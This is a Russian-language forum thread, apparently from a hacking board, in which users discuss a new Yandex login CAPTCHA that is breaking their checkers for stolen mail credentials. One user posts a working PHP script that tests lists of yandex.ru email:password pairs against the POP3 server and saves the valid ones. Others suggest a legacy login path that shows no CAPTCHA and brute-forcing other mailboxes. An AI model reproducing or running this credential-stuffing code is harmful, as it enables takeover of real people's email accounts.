сегодня по делам запустил свой чекер мыл на валид чекал яндекс и смотрю все мыла идут в бэд --- зашел на сайт посмотрел они ввели картинку с вводом цифр при авторизации --- еще толком не разберался в ответах сервера на запросы авторизации может какнибуть можно будет сделать чекер или брутер -- но факт остается фактом вроде поставили новую защиту ps -- если боян и оно там уже висит давно -- то хз я им часто не пользуюсь
там вроде как картинка вылазит тока после нескольких неудачных авторизаций, и уже давно это было сделано..
хз до последнего времени я чекал по несколько сотен акко и нормально было а в этот раз вот какое дело вышло =(
freddi - прав. Картинка появляется только после неудачной авторизации. А если ты зайдешь на http://mail.yandex.ru/classic/ - то никакой картинки не будет. ИМХО брутить надо другие ящики =)
а причем здесь это? чеккер же не на 80 порту работает... кстати а на чем чеккер то написан? если perl... php.. давай скрипты
"Картинка появляется только после неудачной авторизации" если пароль правильно ввести он тоже перебросит на авторизацию с картинкой. у них новый метод защиты.
вот скрипт он работает щас накатал Code: <?php error_reporting(E_ALL); set_time_limit(0); $fr=fopen("resu","r"); $fw=fopen("resu1","w"); echo "<pre>"; while (!feof ($fr)) { $buffer = fgets($fr,255); $lp=explode(':',$buffer,2); $log=explode('@',$lp[0],2); if (($log[1]=='yandex.ru') and (isset($lp[1]))){ $ock=fsockopen("pop.yandex.ru",110); $html=fgets($ock); $usr="user ".$log[0]."\r\n"; fputs($ock,$usr); $html=fgets($ock); $pwr="pass ".$lp[1]."\r\n"; fputs($ock,$pwr); echo $buffer; $html=fgets($ock); echo $html."\r\n"; if (preg_match("/OK/",$html)) { fputs($fw,$buffer); fclose($ock);} else {fclose($ock);} } } echo "OK!"; echo "</pre>"; fclose($fr); fclose($fw); ?> в resu - мыльники и пароли формата: [email protected]:eerdf в resu1 будут валиды Ну че ктонить попробовал? самому интересно, а то лист мыльников небольшой у меня был...
Scipio если ты не заметил то речь идет о веб авторизации а не о pop сервере =) -- так можно и через брутус проверить